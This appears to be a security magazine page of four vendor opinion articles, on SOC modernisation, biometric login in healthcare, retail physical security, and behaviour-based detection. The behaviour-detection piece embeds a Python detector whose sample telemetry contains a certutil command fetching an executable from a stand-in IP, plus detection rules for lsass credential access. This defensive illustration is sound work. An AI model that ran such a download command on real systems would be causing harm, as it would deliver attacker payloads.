
Expert Speak

SOC Modernisation: A Digital Labrador for Next-Level Cybersecurity



Written by Ammar Enaya, Regional Director – METNA, Vectra AI

The Arab Gulf region has a well-deserved reputation as a frontrunner in technology adoption, a reputation its governments have kept throughout the Fourth Industrial Revolution. In the digital transformation era, managed services worked their way onto the agenda of most, if not all, regional organisations, but until recently cybersecurity remained an afterthought.

However, governments in this region have a way of inspiring others by example. By adopting economic visions with technology pillars that put cybersecurity front and center, GCC leaders pushed digital risk management to a top priority in the private sector. Those efforts have paid dividends: Saudi Arabia ranks second and the UAE fifth on the International Telecommunication Union's Global Cybersecurity Index for 2020.

But there is still work to be done. Security professionals are overworked and under-resourced, and that starts in the security operations center (SOC), which all too often clings to a legacy that has had its day. Rogue devices, remote employees and multi-cloud environments have brought previously unseen levels of unpredictability to the SOC. Combine those changes with the advanced methods used in today's ransomware and supply chain attacks and the result is a disaster waiting to happen for any organisation that is not thinking about modernizing the traditional approach.

The Old Way Opens Doors for New Attacks
Traditionally, the legacy SOC is built around prevention and signature-based alerting (think IDS and SIEM correlation rules), an approach that struggles against modern threats and attack methods. The tools typically deployed in this model carry a high cost of ownership and fall short when it comes to detecting and responding to in-progress attacks, because the technology estate has outgrown the SOC as we have come to know it. The perimeter no longer exists, and cloud deployments are outpacing security. Analysts work harder to trawl manually through limited data sources, only to arrive at inaccurate conclusions. What you are left with is a lack of visibility and a security team scrambling through inefficient workflows at a high price.

The time for change is now. We have seen again and again how prevention techniques fail to stop ransomware. Modern ransomware campaigns are human-operated: the encryption payload is not deployed until the final step, so the only real chance to stop them is to detect and block the attacker's movements inside the environment before that point. Attackers are also finding ever more inventive ways to bypass MFA, and while endpoint detection is important, on its own it is no match for a crafty attacker armed with stolen credentials.

But the good news is that defending against today’s attacks doesn’t have to be as impossible as the headlines might lead you to believe.

Moving Towards a Modernized SOC
Before we look at the alternative, it is worth considering the life of today's security professionals, without whom the SOC would be the equivalent of a tree falling in an empty forest. While the customer experience was all the rage before the pandemic, organisations must now prioritize the employee experience. The now-established efficacy of remote work means the region's cyber-talent can work anywhere they want. So, as the region builds SOCs, it needs to design ecosystems that relieve the burden on technologists, or it risks losing the most qualified candidates to foreign employers.

This is all the more reason to modernize and take a futureproof approach that prioritizes visibility and workflow, acting as a kind of digital Labrador retriever: capable of sniffing out and fetching the most evasive targets and dropping them at the feet of threat hunters. It still uses event logs and SIEM tactics but supplements them with richer endpoint and network data, mixing the disciplines of endpoint detection and response (EDR), AI-driven network detection and response (NDR) and user and entity behavior analytics (UEBA). The new SOC drapes a net across on-prem, cloud and cloud-native apps, allowing it to detect previously unknown suspect processes and lateral movement.

And if you are looking for a place to start, meaningful AI can lend an immediate hand in the SOC. Everything from improving alert accuracy and optimizing investigations to threat hunting and adding the horsepower analysts need to decide which threats to prioritize can be achieved with the right AI platform. AI can also help a SOC play to the strengths of its players. AI is incredibly proficient at processing large data sets efficiently and at speeds unmatched by humans, while humans are exceptional at dealing with ambiguity and contextualizing information, which is exactly what they will be free to do with AI on their team. An analyst cannot watch an attack evolve in the middle of the night, but the right AI can catch and stop it so they can get some rest once in a while.

A Breath of Fresh Air in the SOC
Modernization is the future for any organisation intent on delivering an efficient, sustainable SOC. And while this is becoming an increasingly urgent matter for many organisations in order to defend against today’s attacks, it can also be approached in phases by setting achievable goals. For example, if you lack the visibility necessary to accurately detect and respond to an adversary, you may want to prioritize implementing a solution that can help spot early attack signals like recon, privilege escalation, and lateral movement. Or if your organisation has traditionally been focused on prevention, it could be time to evaluate where security investments need to be made in order to gain coverage throughout the entire environment.

In a region where regulatory compliance keeps a lot of stakeholders up at night, a modernized SOC can greatly enhance governance and instill confidence in regulators, investors, and customers. The ability to detect, score and prioritize threats in real time supports swift and effective resolution of issues and helps prevent costly and embarrassing breaches.

Fewer manhours, better outcomes, lower costs, faster resolution, tighter compliance, and the ability to go up against unknown and stealthy attacks? Now that’s a Labrador that deserves a treat.


Biometric Authentication – A Cure for the Common Password



Written by Debra Miller, the Digital Marketing Communications Manager at HID

From 2019 through 2021, nearly 1,900 healthcare data breaches of 500 or more records were reported to the Health and Human Services Office for Civil Rights. In 2021 alone, those breaches exposed the sensitive and supposedly protected health information of 49.8 million individuals, an 11% increase compared to 2019. The reasons for these attacks are both obvious and not so obvious.

The Root Cause of Most Healthcare Security Breaches
The human element, such as phishing, stolen credentials, and human error, is a factor in 82% of data breaches. It is little wonder that these conditions pose critical security and financial risks to the healthcare industry.

One of the obvious reasons for security breaches is that healthcare workers log in to multiple computer systems dozens of times per shift, and typically must remember eight to 20 passwords to access patient-care applications.

Because they work under extreme time constraints and need to remember complicated, ever-changing passwords, some healthcare workers engage in risky password behaviours. For example, 51% of people reuse work passwords in their personal lives; 44% know the risks of reusing passwords but do it anyway; and 69% of employees admit to sharing passwords with colleagues at work. The result is compromised, weak, and reused passwords, which are implicated in 81% of hacking-related breaches.

Moreover, for the past 12 years healthcare, one of the most highly regulated industries, has suffered the highest average cost per breach. An individual's health data can be worth more on the black market than a credit card number, because patient records often contain a complete set of personally identifiable information (PII) alongside financial details.

Malicious actors also seek out healthcare organization vulnerabilities in not-so-obvious ways, such as outdated IT infrastructure or software. Another not-so-obvious target is a healthcare worker's use of personal devices that connect to the network. And even internet-connected medical devices like insulin pumps and heart rate monitors can serve as a gateway to the servers holding patient data.

How Biometric Authentication Provides a Cure for the Common Password
Preventing those breaches is critical to protecting patient privacy and confidentiality. This makes biometric authentication a critical element of a healthcare organization’s identity assurance strategy.

Biometric authentication delivers a high level of identity assurance. While passwords are easy to forget, and wristbands and ID cards can be misplaced or stolen, biometric markers are unique to each individual and cannot be lost or forgotten. Biometric technology relies on something we always have with us: our fingerprints or faces. The flip side is that a biometric cannot be changed if its stored template leaks, so templates must be stored and transmitted with at least the same care as any other credential.

Here is how biometric authentication works. At enrollment, the system captures the owner's biometric and stores it as a template. At login, it captures a fresh sample from whoever is present and compares the two. Because no two captures of the same finger or face are bit-for-bit identical, the comparison is a similarity score checked against a threshold: if the sample is close enough to the template, the system concludes that "visitor" and "owner" are one and the same and grants access. Where that threshold is set trades false rejections of the legitimate user against false acceptances of an impostor.
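To make the threshold decision concrete, here is an added example (not code from the article or from HID) that simulates matching on constructed 64-bit templates and measures how the false-reject and false-accept rates move as the threshold is loosened. The bit-vector representation, the noise model and the thresholds are illustrative assumptions; real matchers use vendor-specific feature extraction and thresholds tuned on measured data.

```python
"""
Added example, not from the article or from HID: a toy template matcher that
shows the decision a biometric system makes. Templates are constructed 64-bit
feature vectors; a real system derives them from a fingerprint or face image.
"""
import random

TEMPLATE_BITS = 64


def hamming_distance(a: int, b: int) -> int:
    """Count the bits in which two templates differ."""
    return bin(a ^ b).count("1")


def matches(enrolled: int, presented: int, threshold: int) -> bool:
    """Accept when the presented sample is within `threshold` differing bits
    of the enrolled template. Two captures of the same finger are never
    bit-identical, so this is a tolerance test, not an equality test."""
    return hamming_distance(enrolled, presented) <= threshold


def perturb(template: int, flips: int, rng: random.Random) -> int:
    """Simulate sensor noise by flipping `flips` distinct bit positions."""
    for pos in rng.sample(range(TEMPLATE_BITS), flips):
        template ^= 1 << pos
    return template


def estimate_rates(threshold: int, trials: int = 2000,
                   genuine_noise: int = 6, seed: int = 1):
    """Return (false_reject_rate, false_accept_rate) for one threshold.

    A genuine attempt is the enrolled template plus `genuine_noise` flipped
    bits; an impostor is an unrelated random template, which differs from
    the enrolled one in about half of its bits on average. The seed makes
    the simulation repeatable (constructed data, not measured rates)."""
    rng = random.Random(seed)
    false_rejects = false_accepts = 0
    for _ in range(trials):
        enrolled = rng.getrandbits(TEMPLATE_BITS)
        genuine = perturb(enrolled, genuine_noise, rng)
        impostor = rng.getrandbits(TEMPLATE_BITS)
        if not matches(enrolled, genuine, threshold):
            false_rejects += 1
        if matches(enrolled, impostor, threshold):
            false_accepts += 1
    return false_rejects / trials, false_accepts / trials


if __name__ == "__main__":
    # Loosening the threshold trades false rejects for false accepts.
    for t in (4, 10, 24, 40):
        frr, far = estimate_rates(t)
        print(f"threshold={t:2d}  FRR={frr:.3f}  FAR={far:.3f}")
```

With the noise model above, a threshold below the genuine noise level rejects every legitimate user, a threshold around 10 accepts every legitimate user and essentially no impostor, and a threshold of 40 lets most impostors through. Production systems choose the operating point from measured genuine and impostor score distributions rather than from a toy model like this one.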

Biometric authentication provides a cure for the common password by providing healthcare organizations with the following benefits:

  • Strong proof of presence for regulatory and legal compliance. Biometric authentication provides instant insight into who accessed which systems and resources, and accurately identifies patients across multiple systems and facilities.
  • Fast and easy patient identity assurance. Biometric matching takes a fraction of a second. Accelerated access to patient data enables clinicians to be more productive and provide better care throughout the patient journey. Biometric authentication streamlines patient registration, check-in, and care eligibility verification. And, in a health emergency, quick, easy, and comprehensive access to medical records saves lives.
  • Minimized human intervention for improved data accuracy. Biometric identification is automated and frictionless, and contactless modalities such as facial recognition avoid shared touch surfaces. It maintains accuracy even when people wear surgical masks, and it eliminates duplicate medical records. Fingerprint scanners have accuracy rates above 99.5%, and best-in-class facial recognition systems deliver an error rate of just 0.08%.
  • Mitigated risks of patient misidentification. Patient misidentification costs the healthcare system billions of dollars each year. And more important, it can lead to tragic medical errors that cause temporary or permanent patient harm. Biometric technologies mitigate these risks by increasing accuracy and tying identification to something people always have with them — their fingerprints or faces.
  • Reduced identity fraud. Nearly 43,000 cases of medical identity theft were reported to the Federal Trade Commission in 2021. By extending security to systems that contain personal and sensitive data, biometrics increases the privacy of those individuals and reduces the risk of identity theft.

How Can Unified Physical Security Help Retailers Thrive in a Changing Environment?



Written by Firas Jadallah, Regional Director, Middle East, and Africa at Genetec

The retail industry has evolved dramatically over a relatively short period. Today, digital transformation has unlocked new business models centered on frictionless, multi-channel shopping and e-commerce while simultaneously presenting new security challenges. It is also worth noting that digitization has driven innovation in video surveillance technologies, creating new opportunities for retailers to use data from video management systems (VMS) in conjunction with data from access control systems (ACS), automatic license plate recognition (ALPR), identity management systems (IMS), sensors, and more.

The key objectives are not only to reduce shrink but also to improve operational efficiency and the overall buyer experience. However, without a fully unified software solution, it is difficult to comprehend how these data puzzle pieces fit together and make sense. Only when retailers are able to consolidate data from multiple sources, can they gain a comprehensive understanding of their environment. A unified physical security platform that allows for the integration of devices and applications, will successfully create a connected store, which centralizes the management of the entire environment for improved visibility, operations, and data intelligence.

How Retailers Can Benefit from Unification:

Frictionless shopping
The introduction of frictionless shopping solutions such as curbside pickup and self-checkout has presented retail security teams with new challenges. Unified security platforms provide a variety of ways to overcome them. If theft is suspected, asset protection managers can easily review video from self-checkout systems and share it with law enforcement as necessary. Unified security platforms also let IT teams devote their time to higher-priority tasks and spend less time on software updates. Similarly, a comprehensive view of the connected store allows corporate security managers to work more effectively and efficiently.

E-commerce and logistics
In 2021, e-commerce sales in the UAE surpassed US$4.8 billion, up from US$2.6 billion in 2019, due to the pandemic-driven acceleration of the global shift towards online shopping. According to an analysis by the Dubai Chamber of Commerce, the value of the UAE's e-commerce market is expected to reach US$9.2 billion by 2026. This rapid growth has given rise to new security concerns and a demand for inventory management logistics at distribution centers.

These centers are often frequented by a large number of non-regular employees, as coordinating the delivery of packages involves multiple parties. Here, ALPR technologies can play a crucial role in tracking who enters and exits distribution centers, and in retail locations, they can record who has received products from a curbside pickup station. ALPR solutions can also assist in identifying Organized Retail Crime (ORC) suspects by determining whether a vehicle has been involved in previous thefts.

Supply chain management is another area in which retail security technologies can play a focal role in overcoming challenges. Retailers can significantly reduce losses by utilizing article tags and video surveillance to monitor their environment and track individual products from suppliers to the warehouse, to the store.

Shrink encompasses numerous forms of loss, but it is primarily caused by external theft, such as organized retail crime (ORC). A recent report by Sensormatic estimates that the annual global retail sales loss due to shrinkage amounts to US$99.56 billion. Aside from the loss of goods, in some cases, retailers are also having to contend with violent altercations with thieves. Retailers are implementing a variety of technologies to combat ORC, including artificial intelligence-based video analytics at point-of-sale (POS)/self-checkout, self-service locking cases, autonomous security robots, and automatic license plate recognition (ALPR), in addition to establishing specialized ORC teams.

Cybersecurity threats such as fraud, account takeovers, malware, ransomware, business email compromise, and data breaches pose escalating risks for retailers today. Any device connected to a retailer's network, be it a smart IoT thermostat, an access control sensor, or a computer, can serve as a gateway for cybercriminals to reach private data stored on servers on that network. Given the interconnected nature of modern technology, data must be secured and monitored at every stage.

When multiple solutions that were not designed to work together are deployed, they can be challenging for teams to manage, maintain, and scale. A unified security platform designed with cybersecurity in mind enables retailers to secure their entire IT infrastructure and reduce the risk of an intruder entering the network through one of their security devices.

Advancing Video Surveillance
The vast improvement in video camera quality and cost reductions over the last year have made video surveillance an essential component of retail security solutions. Furthermore, the digitization and automation of video technologies have further improved their value by transferring mundane tasks from humans to machines. Although adding video surveillance can address some of the challenges posed by frictionless shopping, it can also introduce new ones.

These surveillance systems can accumulate vast volumes of footage, which retailers must then store while also making sense of it. A unified system enables retailers to manage data from all cameras, as well as data from access control and ALPR systems, sensors, smart devices, and maps, through a single, intuitive dashboard. In addition, cross-referencing video footage with additional analytic data can yield insightful results.

These tools can provide invaluable insights into the customer’s journey through the store and at checkout, thereby enabling retailers to enhance their customer’s shopping experience.

Hybrid Cloud Solutions
Cloud-based systems make it efficient for retailers to scale storage requirements as the business environment evolves. However, overhauling an entire IT system all at once is a daunting undertaking. As stores are upgraded or retrofitted, retailers can take advantage of new technologies and functionalities by connecting IoT devices. A hybrid cloud strategy enables retailers to continue operating on-premises systems that meet current requirements while integrating them with adaptable cloud technologies. For companies with a combination of new stores that utilize cloud-based systems and established locations with on-premises systems, support of a hybrid cloud approach through a unified platform enables them to manage the data from all of them in one place.

Insights and Efficiency
When physical security systems are siloed, it is challenging to extract the full value of the data collected by each system. By leveraging a unified, connected store, retailers can combine and display data from all of their security systems in a variety of formats, including customized dashboards, graphical maps, mobile applications, and web clients.

When data is centralized, new insights become apparent. Modern physical security systems allow retailers to personalize dashboards that display data that is most pertinent to specific users. Each department, from asset protection to marketing, will have a unique perspective on data and offer a variety of solutions. Here, interdepartmental collaboration can be essential to the development of new strategies. Moreover, unified security platforms enable retailers to scale, regardless of whether they are opening their first physical store or expanding their global brand to hundreds of locations.

Unified security platforms can be easily deployed and integrated with video surveillance, access control, ALPR, and more. Starting with an open, unified security platform allows retailers to maximize the value of the devices and equipment they already possess, utilizing data in novel ways to streamline operations and gain insights. They can deliver an optimal customer experience without sacrificing security or negatively impacting their bottom line. Everything begins with integration – a connected store for the omnichannel world.


Indicators of Behaviour and the Diminishing Value of IOCs



Written by Hussam Sidani, the Regional Vice President for the Middle East and Turkey at Cybereason

How secure is your organization if you can only stop attacks that have already been detected in other environments based on Indicators of Compromise (IOCs)? Secure enough, if those were the only attacks you needed to be concerned with. But what about targeted attacks with bespoke tactics, techniques, and procedures (TTPs) that have never been documented because they were designed only to be used against your organization?

In today's threat landscape that is exactly what is happening: zero-day exploits, never-before-seen malware strains, and advanced techniques developed specifically for high-value targets are plaguing security teams. Most security solutions do a good job of detecting and preventing known threats, but they continue to struggle with novel ones. The issue runs even deeper than that: how can security teams detect malicious activity on the network earlier if the attacker's actions are not outwardly malicious, because they are exactly the kind of activity we expect to see on a network?

The diminishing value of IOCs
Following a security incident, investigators scour for the evidence and artifacts left behind by the attackers. These can include IP addresses, domain names, file hashes, and more. Once these Indicators of Compromise (IOCs) have been documented, they can be shared so that security teams at other organizations can search their environments for similar threats, and security solutions can be tuned to better detect and prevent them from being used in subsequent attacks. That’s great for everyone, except the initial victims of the attacks, of course — for them, the damage has already been done.

But IOCs are constantly changing and are often unique to a specific target, so leveraging IOCs for proactive defense in another environment is unlikely to produce earlier detections. Even the assumption that IOCs are uniformly applicable within a single attack campaign in the same environment has proven to be demonstrably false.

Furthermore, the more advanced attackers engaged with a high-value target often change their TTPs within the same kill chain when moving from one device to the next, making early detection based on already-known IOCs nearly impossible. IOCs are still quite valuable for detecting known artifacts, just as signature-based detections remain effective against common malware strains, and they will continue to be an important part of our security toolkits for the foreseeable future.

But given the limitations of their application in surfacing highly targeted and novel attacks as described above, the question remains as to how we can detect more reliably and earlier in the kill chain. That’s where Indicators of Behavior (IOBs) come into play.

Defining Indicators of Behaviour
IOBs describe the subtle chains of malicious activity derived from correlating enriched telemetry from across all network assets. Unlike backward-looking IOCs, IOBs offer a proactive means to leverage real-time telemetry to identify attack activity earlier, and they retain their value far longer than IOCs have ever been able to.

IOBs describe the approach that malicious actors take over the course of an attack. They are based on chains of behavior that can reveal an attack at its earliest stages, which is why they are so powerful in detecting novel and highly targeted operations. Sooner or later, an attacker’s path diverges from the paths of benign actors.

IOBs are not just about looking for anomalies or a single indicator of malice at a particular moment in time, although that is part of it. IOBs are about highlighting the attacker's trajectory and intentions by analysing chains of behaviors that, examined together, are malicious and stand out from the background of benign activity on the network.

IOBs can also be leveraged to detect the earliest signs of an attack in progress that are comprised of “normal activity” one would expect to see occurring on a network, such as we see with techniques like living off the land (LotL/LOLBin) attacks where legitimate tools, processes, and binaries native to the network are abused by the attacker.
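As an added example, not code from the article or from Cybereason, the following Python contrasts the two approaches discussed above: matching a published IOC (a file hash) against endpoint telemetry, versus detecting an ordered chain of individually routine behaviours on one host within a time window. The telemetry records, hash values, field names and the four chain stages are constructed for illustration and are not any product's schema or detection content.

```python
"""
Added example (not from the article or from Cybereason): IOC lookup versus a
behaviour-chain detector over constructed endpoint telemetry. Every field,
hash and stage here is an illustrative assumption.
"""
from datetime import datetime, timedelta

# Constructed IOC feed: one hash published after an incident elsewhere.
KNOWN_BAD_HASHES = {
    "9f2c1e1a5b7d4c3e8a6b0f1d2e3c4b5a": "credential dumper seen elsewhere",
}


def _ts(hhmm: str) -> datetime:
    return datetime(2022, 11, 1, int(hhmm[:2]), int(hhmm[3:]))


# Constructed telemetry for three hosts. Each record on its own looks routine.
SAMPLE_EVENTS = [
    {"host": "ws-17", "ts": _ts("09:00"), "type": "process", "image": "whoami.exe",
     "cmdline": "whoami /groups", "sha256": "aaa1"},
    {"host": "ws-17", "ts": _ts("09:04"), "type": "process", "image": "certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://198.51.100.7/u.txt "
                "C:\\Users\\Public\\svchost_update.exe", "sha256": "aaa2"},
    # The dropped tool is a recompiled build, so its hash is not in the feed.
    {"host": "ws-17", "ts": _ts("09:09"), "type": "process_access",
     "image": "svchost_update.exe", "target": "lsass.exe", "sha256": "bbb3"},
    {"host": "ws-17", "ts": _ts("09:15"), "type": "network", "image": "svchost_update.exe",
     "dst": "10.0.0.5", "dst_port": 445, "sha256": "bbb3"},
    # Help-desk admin checking group membership: discovery only.
    {"host": "ws-02", "ts": _ts("10:00"), "type": "process", "image": "whoami.exe",
     "cmdline": "whoami /groups", "sha256": "aaa1"},
    {"host": "ws-02", "ts": _ts("10:01"), "type": "process", "image": "net.exe",
     "cmdline": 'net group "Domain Admins" /domain', "sha256": "ccc4"},
    # Endpoint AV touching lsass: a single stage, no chain.
    {"host": "srv-01", "ts": _ts("11:00"), "type": "process_access",
     "image": "MsMpEng.exe", "target": "lsass.exe", "sha256": "ddd5"},
]


def ioc_matches(events):
    """IOC approach: flag only records whose hash is already on the feed."""
    return [(e["host"], e["image"], KNOWN_BAD_HASHES[e["sha256"]])
            for e in events if e["sha256"] in KNOWN_BAD_HASHES]


# Behaviour stages in the order an intrusion typically progresses. Each
# predicate matches activity that is common on its own (constructed examples).
STAGES = [
    ("discovery", lambda e: e["type"] == "process"
        and e["image"] in {"whoami.exe", "net.exe", "nltest.exe"}),
    ("lolbin_download", lambda e: e["type"] == "process"
        and e["image"] == "certutil.exe" and "-urlcache" in e["cmdline"]),
    ("credential_access", lambda e: e["type"] == "process_access"
        and e["target"] == "lsass.exe"),
    ("lateral_movement", lambda e: e["type"] == "network" and e["dst_port"] == 445),
]


def detect_behavior_chains(events, window=timedelta(minutes=30), min_stages=3):
    """IOB approach: per host, walk the stages in order, taking the first event
    that satisfies each stage after the previously matched one. Alert when at
    least `min_stages` stages line up inside `window`, regardless of hashes."""
    by_host = {}
    for e in sorted(events, key=lambda e: e["ts"]):
        by_host.setdefault(e["host"], []).append(e)

    alerts = []
    for host, evs in by_host.items():
        matched, cursor = [], None
        for name, pred in STAGES:
            hit = next((e for e in evs
                        if pred(e) and (cursor is None or e["ts"] > cursor)), None)
            if hit is None:
                continue  # a missing stage does not break the chain
            matched.append((name, hit))
            cursor = hit["ts"]
        if len(matched) >= min_stages:
            start, end = matched[0][1]["ts"], matched[-1][1]["ts"]
            if end - start <= window:
                alerts.append({"host": host, "start": start, "end": end,
                               "stages": [n for n, _ in matched],
                               "images": sorted({e["image"] for _, e in matched})})
    return alerts


if __name__ == "__main__":
    print("IOC hits:", ioc_matches(SAMPLE_EVENTS))
    for a in detect_behavior_chains(SAMPLE_EVENTS):
        print(f"{a['host']}: {' -> '.join(a['stages'])} "
              f"({a['start']:%H:%M}-{a['end']:%H:%M}) via {a['images']}")
```

On the constructed data the IOC lookup returns nothing, because the attacker's rebuilt tool has a hash the feed has never seen, while the chain detector raises a single alert for ws-17 and stays quiet for the admin's discovery commands and the AV's lsass access. The window and minimum-stage count are the tuning knobs: tighten them and the chain must be fast and complete, loosen them and single stages start to page the on-call analyst.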

Operationalising IOBs for Operation-Centric security
Today’s alert-centric approach to security puts too much focus on the generation of uncorrelated alerts and remediating the individual elements of the larger attack campaign; a process that has proven to be inefficient given the typical resource constraints security operations are subject to.

Conversely, an Operation-Centric approach leveraging IOBs can reorient the detection and response cycle by consolidating otherwise disparate alerts into a single, content-rich correlated detection that serves to comprehensively disrupt the attack progression earlier than is possible with our current reliance on IOCs alone.

Leveraging IOBs to achieve an Operation-Centric approach also presents the opportunity to create a repository of detectable behavior chains that can surface even the most novel of attacks earlier, as well as support automated response playbooks that can better disrupt attacks at their onset.

More work to be done
Understanding attacker intentions and likely pathways from early-stage actions enables defenders to proactively predict and disrupt subsequent stages of an attack, and provides an avenue toward fully autonomous security operations. To achieve a truly Operation-Centric posture and move closer to autonomous security operations, a future-ready standard that universally defines and operationalizes IOBs is required.

To be truly useful, there needs to be a common definition, language, and expression of IOBs that is completely independent of any particular security tool or vendor. The wide array of solutions available can provide the raw telemetry as well as the color and context required to collectively interpret observable behaviours.

But, as it stands today, security tools themselves don’t provide a standardized language that can accurately describe and operationalise the chains of behavior that will enable us to detect and respond to attacks faster than the adversary can adapt. Operationalising IOBs will require standardization that will deliver the full potential value of the entire security stack to quickly and autonomously deliver the necessary context and correlations across diverse telemetry sources.

But achieving an Operation-Centric approach that leverages IOBs will ultimately empower security operations to predictively respond to changing TTPs more swiftly than attackers can modify and adjust them to circumvent defenses, which is key to finally reversing the adversary advantage and returning the high ground to the Defenders.



Copyright © 2021 Security Review Magazine. Rysha Media LLC. All Rights Reserved.